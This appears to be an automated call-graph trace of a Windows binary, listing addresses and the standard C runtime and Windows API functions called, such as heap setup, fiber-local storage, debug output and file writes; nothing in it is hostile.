16402->16403 16404 7ffc65cfbf1c RtlVirtualUnwind 16402->16404 16405 7ffc65cfbf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16403->16405 16404->16405 16408 7ffc65cfbfde _invalid_parameter 16405->16408 16407 7ffc65cfbe2d GetCurrentProcess TerminateProcess 16407->16394 16409 7ffc65cf3280 16408->16409 16410 7ffc65cf3289 16409->16410 16411 7ffc65cf3294 16410->16411 16412 7ffc65cf3720 RtlCaptureContext RtlLookupFunctionEntry 16410->16412 16411->16407 16413 7ffc65cf3764 RtlVirtualUnwind 16412->16413 16414 7ffc65cf37a5 16412->16414 16415 7ffc65cf37c7 IsDebuggerPresent 16413->16415 16414->16415 16420 7ffc65cf8d90 16415->16420 16417 7ffc65cf3826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16418 7ffc65cf3844 _invalid_parameter 16417->16418 16419 7ffc65cf384e GetCurrentProcess TerminateProcess 16417->16419 16418->16419 16419->16407 16420->16417 16421->16378 16424 7ffc65cf63f1 16422->16424 16423 7ffc65cf6447 16425 7ffc65cfbd70 _invalid_parameter 17 API calls 16423->16425 16424->16423 16427 7ffc65cf6480 16424->16427 16426 7ffc65cf647b 16425->16426 16426->16382 16429 7ffc65cf6504 16427->16429 16434 7ffc65cf9360 LeaveCriticalSection 16427->16434 16429->16382 16431 7ffc65cf6681 _CrtMemDumpAllObjectsSince 16430->16431 16435 7ffc65cf6850 16431->16435 16433 7ffc65cf6698 _LocaleUpdate::~_LocaleUpdate 16433->16381 16434->16426 16436 7ffc65cf6871 16435->16436 16437 7ffc65cf6ba6 16436->16437 16440 7ffc65cf68ed _CrtIsValidPointer 16436->16440 16465 7ffc65cf9360 LeaveCriticalSection 16437->16465 16439 7ffc65cf6bb0 16439->16433 16441 7ffc65cf6976 16440->16441 16442 7ffc65cf695e IsBadReadPtr 16440->16442 16450 7ffc65cf692f 16440->16450 16443 7ffc65cf6ad2 16441->16443 16444 7ffc65cf6a29 16441->16444 16442->16441 16445 7ffc65cf6add 16443->16445 16448 7ffc65cf6b2d 16443->16448 16446 7ffc65cf6a86 IsBadReadPtr 16444->16446 16447 7ffc65cf6abe 16444->16447 16449 7ffc65cf6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16445->16449 16446->16447 16446->16450 16453 7ffc65cf6bf0 16447->16453 16448->16450 16452 7ffc65cf6bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16448->16452 16449->16450 16450->16433 16452->16450 16454 7ffc65cf6c28 16453->16454 16455 7ffc65cf6c7a _CrtMemDumpAllObjectsSince 16454->16455 16456 7ffc65cf6e25 _LocaleUpdate::~_LocaleUpdate 16454->16456 16460 7ffc65cf6ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16455->16460 16466 7ffc65cfc260 16455->16466 16457 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16456->16457 16458 7ffc65cf6e89 16457->16458 16458->16450 16470 7ffc65cfc0c0 16460->16470 16462 7ffc65cf6e12 16462->16450 16463 7ffc65cf6dc7 16463->16462 16473 7ffc65cf6ea0 16463->16473 16465->16439 16467 7ffc65cfc286 _CrtMemDumpAllObjectsSince wcsxfrm 16466->16467 16469 7ffc65cfc29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16467->16469 16477 7ffc65cff4d0 16467->16477 16469->16460 16488 7ffc65d02260 16470->16488 16472 7ffc65cfc103 16472->16463 16474 7ffc65cf6ed1 16473->16474 16475 7ffc65cf6ebd 16473->16475 16474->16462 16475->16474 16476 7ffc65cfbe00 _invalid_parameter 16 API calls 16475->16476 16476->16474 16478 7ffc65cff4f9 _CrtMemDumpAllObjectsSince 16477->16478 16481 7ffc65cff570 16478->16481 16480 7ffc65cff550 _LocaleUpdate::~_LocaleUpdate 16480->16469 16482 7ffc65cff599 MultiByteToWideChar 16481->16482 16484 7ffc65cff60b malloc _calloc_dbg_impl _MarkAllocaS 16482->16484 16486 7ffc65cff604 _CrtMemDumpAllObjectsSince_stat 16482->16486 16485 7ffc65cff68b MultiByteToWideChar 16484->16485 16484->16486 16485->16486 16487 7ffc65cff6ca GetStringTypeW 16485->16487 16486->16480 16487->16486 16489 7ffc65d0228b 16488->16489 16490 7ffc65d022e1 16489->16490 16493 7ffc65d0231f 16489->16493 16491 7ffc65cfbd70 _invalid_parameter 17 API calls 16490->16491 16495 7ffc65d02315 _calloc_dbg_impl 16491->16495 16492 7ffc65d02385 16494 7ffc65cfbd70 _invalid_parameter 17 API calls 16492->16494 16493->16492 16496 7ffc65d023c3 _calloc_dbg_impl 16493->16496 16494->16495 16495->16472 16496->16495 16497 7ffc65cfbd70 _invalid_parameter 17 API calls 16496->16497 16497->16495 16498->16388 16500 7ffc65cf74d1 ExitProcess 16499->16500 16501 7ffc65cf74b2 GetProcAddress 16499->16501 16501->16500 16845 7ffc65cf8670 GetEnvironmentStringsW 16846 7ffc65cf8690 16845->16846 16848 7ffc65cf8697 WideCharToMultiByte 16845->16848 16849 7ffc65cf8733 16848->16849 16850 7ffc65cf875f FreeEnvironmentStringsW 16848->16850 16849->16850 16851 7ffc65cf876e WideCharToMultiByte 16849->16851 16850->16846 16852 7ffc65cf87aa 16851->16852 16853 7ffc65cf87c2 FreeEnvironmentStringsW 16851->16853 16852->16853 16853->16846 17561 7ffc65d10550 17562 7ffc65d1055e 17561->17562 17563 7ffc65d10575 17561->17563 17562->17563 17564 7ffc65d10568 CloseHandle 17562->17564 17564->17563 18518 7ffc65d01b64 18519 7ffc65d01b9d 18518->18519 18520 7ffc65d01c86 18519->18520 18521 7ffc65d0ab10 17 API calls 18519->18521 18523 7ffc65d01bed 18519->18523 18522 7ffc65d09290 23 API calls 18520->18522 18520->18523 18521->18520 18522->18523 16663 7ffc65cf8860 HeapCreate 16664 7ffc65cf8891 GetVersion 16663->16664 16665 7ffc65cf888d 16663->16665 16666 7ffc65cf88a7 HeapSetInformation 16664->16666 16667 7ffc65cf88c1 16664->16667 16666->16667 16667->16665 16854 7ffc65d05260 16855 7ffc65d05296 __SehTransFilter _CreateFrameInfo 16854->16855 16858 7ffc65cfed30 16855->16858 16857 7ffc65d053e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 16859 7ffc65cfed3e 16858->16859 16860 7ffc65cfcf80 _inconsistency 36 API calls 16859->16860 16862 7ffc65cfed4c 16859->16862 16860->16862 16861 7ffc65cfed88 16861->16857 16862->16861 16863 7ffc65cfcf80 _inconsistency 36 API calls 16862->16863 16863->16861 17569 7ffc65d0595c 17570 7ffc65cfcf50 terminate 35 API calls 17569->17570 17571 7ffc65d05961 17570->17571 16232 7ffc65cf461b 16235 7ffc65cf4625 _calloc_dbg_impl 16232->16235 16234 7ffc65cf48be 16236 7ffc65cf9360 LeaveCriticalSection 16235->16236 16236->16234 17985 7ffc65cf7816 17986 7ffc65cf7826 _calloc_dbg 17985->17986 17989 7ffc65cf7a19 GetFileType 17986->17989 17990 7ffc65cf7a32 InitializeCriticalSectionAndSpinCount 17986->17990 17992 7ffc65cf7ab9 17986->17992 17987 7ffc65cf7ce0 SetHandleCount 17997 7ffc65cf7aaf 17987->17997 17988 7ffc65cf7c7b 17988->17987 17989->17990 17989->17992 17990->17992 17990->17997 17991 7ffc65cf7b95 GetStdHandle 17991->17988 17993 7ffc65cf7bb9 17991->17993 17992->17987 17992->17988 17992->17991 17993->17988 17994 7ffc65cf7bc8 GetFileType 17993->17994 17994->17988 17996 7ffc65cf7beb InitializeCriticalSectionAndSpinCount 17994->17996 17996->17988 17996->17997 16864 7ffc65d00215 16865 7ffc65d00231 16864->16865 16869 7ffc65d00302 16864->16869 16935 7ffc65d08c80 16865->16935 16867 7ffc65d00489 16955 7ffc65d02d80 16867->16955 16872 7ffc65d0040d 16869->16872 16942 7ffc65d08c30 16869->16942 16870 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16873 7ffc65d0027e OutputDebugStringW 16870->16873 16872->16867 16875 7ffc65d01640 17 API calls 16872->16875 16876 7ffc65d00296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 16873->16876 16874 7ffc65d004a3 16877 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16874->16877 16879 7ffc65d0045c 16875->16879 16888 7ffc65d002f2 16876->16888 16881 7ffc65d004d0 16877->16881 16882 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16879->16882 16883 7ffc65d0053d 16881->16883 16884 7ffc65d02d80 17 API calls 16881->16884 16890 7ffc65d00583 16881->16890 16882->16867 16885 7ffc65d02d80 17 API calls 16883->16885 16886 7ffc65d00510 16884->16886 16887 7ffc65d00556 16885->16887 16891 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16886->16891 16892 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16887->16892 16893 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16888->16893 16889 7ffc65d00357 16894 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16889->16894 16895 7ffc65d003af 16889->16895 16968 7ffc65d01590 16890->16968 16891->16883 16892->16890 16896 7ffc65d00cae 16893->16896 16894->16895 16895->16872 16945 7ffc65d01640 16895->16945 16898 7ffc65d003e0 16900 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16898->16900 16900->16872 16901 7ffc65d005fa 16902 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16901->16902 16903 7ffc65d00652 16901->16903 16902->16903 16904 7ffc65d01640 17 API calls 16903->16904 16907 7ffc65d006b0 16903->16907 16905 7ffc65d00683 16904->16905 16906 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16905->16906 16906->16907 16908 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16907->16908 16909 7ffc65d00769 16908->16909 16910 7ffc65cfd490 std::exception::_Copy_str 17 API calls 16909->16910 16923 7ffc65d007bd 16909->16923 16911 7ffc65d00790 16910->16911 16912 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16911->16912 16912->16923 16913 7ffc65d00905 16913->16888 16914 7ffc65d00a26 16913->16914 16915 7ffc65d009a4 GetFileType 16913->16915 16916 7ffc65d00b97 OutputDebugStringW 16914->16916 16917 7ffc65d00ba5 16914->16917 16919 7ffc65d009d0 16915->16919 16925 7ffc65d009ce 16915->16925 16916->16917 16917->16888 16920 7ffc65d00c23 16917->16920 16922 7ffc65d08c80 _itow_s 17 API calls 16917->16922 16921 7ffc65d009dd WriteConsoleW 16919->16921 16972 7ffc65cfb470 16920->16972 16921->16914 16924 7ffc65d00a2b GetLastError 16921->16924 16926 7ffc65d00bf6 16922->16926 16923->16913 16971 7ffc65cf9360 LeaveCriticalSection 16923->16971 16924->16914 16924->16925 16927 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16925->16927 16928 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16926->16928 16930 7ffc65d00ab5 16927->16930 16928->16920 16931 7ffc65d00b26 WriteFile 16930->16931 16932 7ffc65d00ad0 16930->16932 16931->16914 16934 7ffc65d00add WriteFile 16932->16934 16934->16914 16936 7ffc65d08cd3 16935->16936 16937 7ffc65d08ca6 16935->16937 16938 7ffc65d08d00 _itow_s 17 API calls 16936->16938 16937->16936 16939 7ffc65d08cad 16937->16939 16940 7ffc65d00251 16938->16940 16998 7ffc65d08d00 16939->16998 16940->16870 17014 7ffc65d086b0 16942->17014 16944 7ffc65d08c74 16944->16889 16946 7ffc65d01661 16945->16946 16947 7ffc65d016c2 16946->16947 16949 7ffc65d01700 _calloc_dbg_impl 16946->16949 16948 7ffc65cfbd70 _invalid_parameter 17 API calls 16947->16948 16951 7ffc65d016f6 _calloc_dbg_impl 16948->16951 16950 7ffc65d017f4 16949->16950 16952 7ffc65d01832 _calloc_dbg_impl 16949->16952 16953 7ffc65cfbd70 _invalid_parameter 17 API calls 16950->16953 16951->16898 16952->16951 16954 7ffc65cfbd70 _invalid_parameter 17 API calls 16952->16954 16953->16951 16954->16951 16956 7ffc65d02da1 16955->16956 16957 7ffc65d02e02 16956->16957 16959 7ffc65d02e40 _calloc_dbg_impl 16956->16959 16958 7ffc65cfbd70 _invalid_parameter 17 API calls 16957->16958 16961 7ffc65d02e36 _calloc_dbg_impl 16958->16961 16960 7ffc65d02f34 16959->16960 16963 7ffc65d02f72 _calloc_dbg_impl 16959->16963 16964 7ffc65cfbd70 _invalid_parameter 17 API calls 16960->16964 16961->16874 16962 7ffc65d030f3 _calloc_dbg_impl 16962->16961 16967 7ffc65cfbd70 _invalid_parameter 17 API calls 16962->16967 16963->16962 16965 7ffc65d030b5 16963->16965 16964->16961 16966 7ffc65cfbd70 _invalid_parameter 17 API calls 16965->16966 16966->16961 16967->16961 16969 7ffc65d086b0 _wcsftime_l 17 API calls 16968->16969 16970 7ffc65d015de 16969->16970 16970->16901 16971->16913 16973 7ffc65cfb48d 16972->16973 16974 7ffc65cfb4ce GetModuleFileNameW 16973->16974 16993 7ffc65cfb4c4 16973->16993 16975 7ffc65cfb4f2 16974->16975 16980 7ffc65cfb538 16974->16980 16977 7ffc65d01640 17 API calls 16975->16977 16976 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16978 7ffc65cfba58 16976->16978 16979 7ffc65cfb50b 16977->16979 16978->16888 16981 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16979->16981 16982 7ffc65d00fd0 17 API calls 16980->16982 16985 7ffc65cfb5f2 16980->16985 16981->16980 16983 7ffc65cfb5c5 16982->16983 16984 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16983->16984 16984->16985 16986 7ffc65d01590 _snwprintf_s 17 API calls 16985->16986 16987 7ffc65cfb940 16986->16987 16988 7ffc65cfb998 16987->16988 16989 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 16987->16989 16990 7ffc65d01640 17 API calls 16988->16990 16994 7ffc65cfb9f6 16988->16994 16989->16988 16991 7ffc65cfb9c9 16990->16991 16992 7ffc65cf7ff0 _invoke_watson_if_error 16 API calls 16991->16992 16992->16994 16993->16976 16994->16993 16995 7ffc65cfcff0 terminate 34 API calls 16994->16995 16996 7ffc65cfba2b 16995->16996 16997 7ffc65cf7090 _exit 33 API calls 16996->16997 16997->16993 16999 7ffc65d08d25 16998->16999 17000 7ffc65d08d7b 16999->17000 17001 7ffc65d08db9 16999->17001 17002 7ffc65cfbd70 _invalid_parameter 17 API calls 17000->17002 17003 7ffc65d08e58 _calloc_dbg_impl 17001->17003 17004 7ffc65d08e1a 17001->17004 17011 7ffc65d08daf 17002->17011 17006 7ffc65d08f5d 17003->17006 17008 7ffc65d08f9b 17003->17008 17005 7ffc65cfbd70 _invalid_parameter 17 API calls 17004->17005 17005->17011 17007 7ffc65cfbd70 _invalid_parameter 17 API calls 17006->17007 17007->17011 17009 7ffc65d0900e 17008->17009 17012 7ffc65d0904c 17008->17012 17010 7ffc65cfbd70 _invalid_parameter 17 API calls 17009->17010 17010->17011 17011->16940 17012->17011 17013 7ffc65cfbd70 _invalid_parameter 17 API calls 17012->17013 17013->17011 17015 7ffc65d086e6 17014->17015 17016 7ffc65d0873c 17015->17016 17020 7ffc65d0877a 17015->17020 17017 7ffc65cfbd70 _invalid_parameter 17 API calls 17016->17017 17026 7ffc65d08770 _calloc_dbg_impl 17017->17026 17018 7ffc65d0884c 17021 7ffc65d08992 17018->17021 17022 7ffc65d08862 17018->17022 17019 7ffc65d0880e 17023 7ffc65cfbd70 _invalid_parameter 17 API calls 17019->17023 17020->17018 17020->17019 17020->17026 17025 7ffc65d08350 _wcsftime_l 17 API calls 17021->17025 17029 7ffc65d08350 17022->17029 17023->17026 17027 7ffc65d088b1 _calloc_dbg_impl 17025->17027 17026->16944 17027->17026 17028 7ffc65cfbd70 _invalid_parameter 17 API calls 17027->17028 17028->17026 17030 7ffc65d0839b 17029->17030 17031 7ffc65d083f1 17030->17031 17033 7ffc65d0842f 17030->17033 17032 7ffc65cfbd70 _invalid_parameter 17 API calls 17031->17032 17035 7ffc65d08425 17032->17035 17034 7ffc65cfbd70 _invalid_parameter 17 API calls 17033->17034 17033->17035 17034->17035 17035->17027 17036 7ffc65cfae14 17037 7ffc65cfb390 17036->17037 17038 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17037->17038 17039 7ffc65cfb3a0 17038->17039 17998 7ffc65d0e424 17999 7ffc65d0e469 _CrtMemDumpAllObjectsSince 17998->17999 18000 7ffc65d0e588 DecodePointer 17999->18000 18001 7ffc65d0e5fd _CrtMemDumpAllObjectsSince 18000->18001 18002 7ffc65d0e642 _CrtMemDumpAllObjectsSince 18001->18002 18003 7ffc65d0e61b DecodePointer 18001->18003 18004 7ffc65d0e666 DecodePointer 18002->18004 18005 7ffc65d0e68d std::exception::_Copy_str 18002->18005 18003->18002 18004->18005 18006 7ffc65d0eadf 18005->18006 18007 7ffc65d0eec0 25 API calls 18005->18007 18014 7ffc65d0da75 18005->18014 18008 7ffc65d0ef10 25 API calls 18006->18008 18007->18006 18009 7ffc65d0eafd 18008->18009 18010 7ffc65d0eb33 18009->18010 18012 7ffc65d0eec0 25 API calls 18009->18012 18011 7ffc65d0ec29 18010->18011 18025 7ffc65d0eb49 _CrtMemDumpAllObjectsSince 18010->18025 18013 7ffc65d0ef10 25 API calls 18011->18013 18012->18010 18015 7ffc65d0ebda 18013->18015 18016 7ffc65d0eca1 18014->18016 18020 7ffc65d0dbb5 18014->18020 18015->18014 18019 7ffc65d0eec0 25 API calls 18015->18019 18017 7ffc65cfbd70 _invalid_parameter 17 API calls 18016->18017 18021 7ffc65d0dbe9 _LocaleUpdate::~_LocaleUpdate 18016->18021 18017->18021 18018 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18022 7ffc65d0ed9e 18018->18022 18019->18014 18024 7ffc65cfbd70 _invalid_parameter 17 API calls 18020->18024 18021->18018 18023 7ffc65d0f000 wcsxfrm 2 API calls 18023->18025 18024->18021 18025->18015 18025->18023 18026 7ffc65d0ee40 25 API calls 18025->18026 18026->18025 18027 7ffc65d02c10 18028 7ffc65d02c53 18027->18028 18029 7ffc65d02c24 _updatetlocinfoEx_nolock 18027->18029 18031 7ffc65cf9360 LeaveCriticalSection 18029->18031 18031->18028 18546 7ffc65d0ff2d 18547 7ffc65d0ff37 18546->18547 18548 7ffc65d10042 18547->18548 18552 7ffc65d0ff47 18547->18552 18561 7ffc65cf9360 LeaveCriticalSection 18548->18561 18550 7ffc65d1003d 18551 7ffc65d1004c 18552->18550 18553 7ffc65d0ae90 _lock_file2 EnterCriticalSection 18552->18553 18554 7ffc65d0ff97 18553->18554 18555 7ffc65d0ffd0 18554->18555 18557 7ffc65d0ffe1 18554->18557 18558 7ffc65d0ffbb 18554->18558 18556 7ffc65d0af60 _unlock_file2 2 API calls 18555->18556 18556->18550 18557->18555 18560 7ffc65d0fd70 _fflush_nolock 25 API calls 18557->18560 18559 7ffc65d0fd70 _fflush_nolock 25 API calls 18558->18559 18559->18555 18560->18555 18561->18551 17581 7ffc65cf3909 17583 7ffc65cf3913 __SehTransFilter 17581->17583 17582 7ffc65cf39db __SehTransFilter 17583->17582 17584 7ffc65cf3a71 RtlUnwindEx 17583->17584 17584->17582 18032 7ffc65cf3409 18033 7ffc65cf3e00 3 API calls 18032->18033 18034 7ffc65cf340e 18033->18034 18037 7ffc65cf88d0 HeapDestroy 18034->18037 18036 7ffc65cf3413 18037->18036 18038 7ffc65d0d830 18039 7ffc65d0d8aa 18038->18039 18040 7ffc65d0d926 18039->18040 18042 7ffc65d0d97b 18039->18042 18041 7ffc65cfbd70 _invalid_parameter 17 API calls 18040->18041 18046 7ffc65d0d95a _LocaleUpdate::~_LocaleUpdate 18041->18046 18043 7ffc65d0d9ee 18042->18043 18049 7ffc65d0da43 18042->18049 18044 7ffc65cfbd70 _invalid_parameter 17 API calls 18043->18044 18044->18046 18045 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18047 7ffc65d0ed9e 18045->18047 18046->18045 18048 7ffc65d0eca1 18048->18046 18050 7ffc65cfbd70 _invalid_parameter 17 API calls 18048->18050 18049->18048 18051 7ffc65d0dbb5 18049->18051 18050->18046 18052 7ffc65cfbd70 _invalid_parameter 17 API calls 18051->18052 18052->18046 17049 7ffc65d06203 17051 7ffc65d0616e _CrtMemDumpAllObjectsSince wcsxfrm 17049->17051 17050 7ffc65d06238 MultiByteToWideChar 17052 7ffc65d061c8 _LocaleUpdate::~_LocaleUpdate 17050->17052 17051->17050 17051->17052 18053 7ffc65d0c435 18054 7ffc65d0c479 _CrtMemDumpAllObjectsSince 18053->18054 18055 7ffc65d0c598 DecodePointer 18054->18055 18056 7ffc65d0c60d _CrtMemDumpAllObjectsSince 18055->18056 18057 7ffc65d0c62b DecodePointer 18056->18057 18058 7ffc65d0c652 _CrtMemDumpAllObjectsSince 18056->18058 18057->18058 18059 7ffc65d0c676 DecodePointer 18058->18059 18069 7ffc65d0c69d std::exception::_Copy_str 18058->18069 18059->18069 18060 7ffc65d0b99c 18061 7ffc65d0cc93 18060->18061 18065 7ffc65d0bada 18060->18065 18062 7ffc65cfbd70 _invalid_parameter 17 API calls 18061->18062 18064 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 18061->18064 18062->18064 18063 7ffc65d0b530 wctomb_s 19 API calls 18063->18069 18066 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18064->18066 18068 7ffc65cfbd70 _invalid_parameter 17 API calls 18065->18068 18067 7ffc65d0cd90 18066->18067 18068->18064 18069->18060 18069->18063 17598 7ffc65d09939 17599 7ffc65d09951 __doserrno 17598->17599 17600 7ffc65cfbd70 _invalid_parameter 17 API calls 17599->17600 17601 7ffc65d099d7 17600->17601 17602 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17601->17602 17603 7ffc65d0a9f5 17602->17603 17059 7ffc65d03e3b 17060 7ffc65d03ec7 17059->17060 17063 7ffc65cfe790 17060->17063 17064 7ffc65cfe500 __SetUnwindTryBlock 37 API calls 17063->17064 17065 7ffc65cfe7bc 17064->17065 17066 7ffc65d03b40 __StateFromControlPc 36 API calls 17065->17066 17067 7ffc65cfe7d0 __SehTransFilter 17066->17067 17070 7ffc65d04f20 17067->17070 17069 7ffc65cfe81e 17077 7ffc65d03b70 17070->17077 17072 7ffc65cfcf80 _inconsistency 36 API calls 17076 7ffc65d04f55 __SehTransFilter _SetImageBase __SetState 17072->17076 17073 7ffc65d05103 17074 7ffc65d0514a __SetState 17073->17074 17075 7ffc65cfcf80 _inconsistency 36 API calls 17073->17075 17074->17069 17075->17074 17076->17072 17076->17073 17078 7ffc65d03b9a 17077->17078 17079 7ffc65d03ba9 17077->17079 17080 7ffc65d03b40 __StateFromControlPc 36 API calls 17078->17080 17079->17076 17080->17079 18566 7ffc65d0e2fc 18567 7ffc65d0e309 get_int64_arg _get_printf_count_output 18566->18567 18568 7ffc65d0e38c 18567->18568 18569 7ffc65d0e3e1 18567->18569 18572 7ffc65cfbd70 _invalid_parameter 17 API calls 18568->18572 18570 7ffc65d0eadf 18569->18570 18571 7ffc65d0eec0 25 API calls 18569->18571 18581 7ffc65d0da75 18569->18581 18573 7ffc65d0ef10 25 API calls 18570->18573 18571->18570 18579 7ffc65d0dbe9 _LocaleUpdate::~_LocaleUpdate 18572->18579 18574 7ffc65d0eafd 18573->18574 18575 7ffc65d0eb33 18574->18575 18577 7ffc65d0eec0 25 API calls 18574->18577 18576 7ffc65d0ec29 18575->18576 18590 7ffc65d0eb49 _CrtMemDumpAllObjectsSince 18575->18590 18578 7ffc65d0ef10 25 API calls 18576->18578 18577->18575 18582 7ffc65d0ebda 18578->18582 18580 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18579->18580 18583 7ffc65d0ed9e 18580->18583 18584 7ffc65d0eca1 18581->18584 18587 7ffc65d0dbb5 18581->18587 18582->18581 18586 7ffc65d0eec0 25 API calls 18582->18586 18584->18579 18585 7ffc65cfbd70 _invalid_parameter 17 API calls 18584->18585 18585->18579 18586->18581 18589 7ffc65cfbd70 _invalid_parameter 17 API calls 18587->18589 18588 7ffc65d0f000 wcsxfrm 2 API calls 18588->18590 18589->18579 18590->18582 18590->18588 18591 7ffc65d0ee40 25 API calls 18590->18591 18591->18590 17081 7ffc65d11200 17082 7ffc65cfed30 _FindAndUnlinkFrame 36 API calls 17081->17082 17083 7ffc65d11212 _IsExceptionObjectToBeDestroyed __SehTransFilter 17082->17083 17084 7ffc65d10204 17085 7ffc65d1023d 17084->17085 17086 7ffc65d103d7 17085->17086 17088 7ffc65d10326 17085->17088 17090 7ffc65d0ab10 17085->17090 17088->17086 17094 7ffc65d09290 17088->17094 17091 7ffc65d0ab23 17090->17091 17092 7ffc65d0ab35 17090->17092 17091->17088 17092->17091 17093 7ffc65cfbd70 _invalid_parameter 17 API calls 17092->17093 17093->17091 17095 7ffc65d092d8 17094->17095 17101 7ffc65d092b6 __doserrno 17094->17101 17096 7ffc65d09341 __doserrno 17095->17096 17097 7ffc65d0938c 17095->17097 17099 7ffc65cfbd70 _invalid_parameter 17 API calls 17096->17099 17098 7ffc65d0945b 17097->17098 17103 7ffc65d09410 __doserrno 17097->17103 17108 7ffc65d0fae0 17098->17108 17099->17101 17101->17086 17105 7ffc65cfbd70 _invalid_parameter 17 API calls 17103->17105 17105->17101 17106 7ffc65d094a6 __doserrno 17122 7ffc65d0fbc0 LeaveCriticalSection 17106->17122 17109 7ffc65d0fb7a 17108->17109 17112 7ffc65d0fb25 17108->17112 17110 7ffc65d09464 17109->17110 17111 7ffc65d0fb81 EnterCriticalSection 17109->17111 17110->17106 17116 7ffc65d09520 17110->17116 17111->17110 17113 7ffc65d0fb56 17112->17113 17114 7ffc65d0fb3b InitializeCriticalSectionAndSpinCount 17112->17114 17123 7ffc65cf9360 LeaveCriticalSection 17113->17123 17114->17113 17124 7ffc65d0f900 17116->17124 17118 7ffc65d09545 17119 7ffc65d0959d SetFilePointer 17118->17119 17121 7ffc65d09552 _dosmaperr 17118->17121 17120 7ffc65d095c1 GetLastError 17119->17120 17119->17121 17120->17121 17121->17106 17122->17101 17123->17109 17125 7ffc65d0f935 17124->17125 17127 7ffc65d0f913 __doserrno 17124->17127 17126 7ffc65d0f99e __doserrno 17125->17126 17129 7ffc65d0f9e9 __doserrno 17125->17129 17128 7ffc65cfbd70 _invalid_parameter 17 API calls 17126->17128 17127->17118 17128->17127 17129->17127 17130 7ffc65cfbd70 _invalid_parameter 17 API calls 17129->17130 17130->17127 18075 7ffc65cf6c32 18076 7ffc65cf6c3c 18075->18076 18077 7ffc65cf6e25 _LocaleUpdate::~_LocaleUpdate 18076->18077 18079 7ffc65cf6c7a _CrtMemDumpAllObjectsSince 18076->18079 18078 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18077->18078 18080 7ffc65cf6e89 18078->18080 18081 7ffc65cfc260 _CrtMemDumpAllObjectsSince_stat 3 API calls 18079->18081 18082 7ffc65cf6ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 18079->18082 18081->18082 18083 7ffc65cfc0c0 _swprintf_p 17 API calls 18082->18083 18085 7ffc65cf6dc7 18083->18085 18084 7ffc65cf6e12 18085->18084 18086 7ffc65cf6ea0 _invoke_watson_if_oneof 16 API calls 18085->18086 18086->18084 16258 7ffc65cf3433 16259 7ffc65cf3437 16258->16259 16263 7ffc65cf3446 16258->16263 16266 7ffc65cf7d00 16259->16266 16267 7ffc65cf7d0e 16266->16267 16268 7ffc65cf343c 16267->16268 16269 7ffc65cf7d87 DeleteCriticalSection 16267->16269 16270 7ffc65cf3e00 16268->16270 16269->16267 16271 7ffc65cf3e23 16270->16271 16272 7ffc65cf3e0d FlsFree 16270->16272 16276 7ffc65cf90b0 16271->16276 16272->16271 16275 7ffc65cf88d0 HeapDestroy 16275->16263 16280 7ffc65cf90be 16276->16280 16277 7ffc65cf3441 16277->16275 16278 7ffc65cf90fd DeleteCriticalSection 16278->16280 16279 7ffc65cf914d 16279->16277 16281 7ffc65cf9196 DeleteCriticalSection 16279->16281 16280->16278 16280->16279 16281->16279 16289 7ffc65cf3d30 16307 7ffc65cf7540 16289->16307 16294 7ffc65cf3d42 16296 7ffc65cf3e00 3 API calls 16294->16296 16295 7ffc65cf3d4e FlsAlloc 16297 7ffc65cf3d6a 16295->16297 16298 7ffc65cf3d73 _calloc_dbg 16295->16298 16299 7ffc65cf3d47 16296->16299 16300 7ffc65cf3e00 3 API calls 16297->16300 16301 7ffc65cf3db9 16298->16301 16302 7ffc65cf3da4 FlsSetValue 16298->16302 16300->16299 16303 7ffc65cf3e00 3 API calls 16301->16303 16302->16301 16304 7ffc65cf3dc2 16302->16304 16303->16299 16316 7ffc65cf3e30 16304->16316 16322 7ffc65cf3d00 RtlEncodePointer 16307->16322 16309 7ffc65cf7549 _initp_misc_winsig 16323 7ffc65cfcf20 EncodePointer 16309->16323 16311 7ffc65cf3d39 16312 7ffc65cf8fe0 16311->16312 16314 7ffc65cf8ff6 16312->16314 16313 7ffc65cf3d3e 16313->16294 16313->16295 16314->16313 16315 7ffc65cf9022 InitializeCriticalSectionAndSpinCount 16314->16315 16315->16313 16315->16314 16317 7ffc65cf3ead 16316->16317 16324 7ffc65cf9360 LeaveCriticalSection 16317->16324 16319 7ffc65cf3ec7 _updatetlocinfoEx_nolock 16325 7ffc65cf9360 LeaveCriticalSection 16319->16325 16321 7ffc65cf3dce GetCurrentThreadId 16321->16299 16322->16309 16323->16311 16324->16319 16325->16321 17619 7ffc65cf3130 17620 7ffc65cf3170 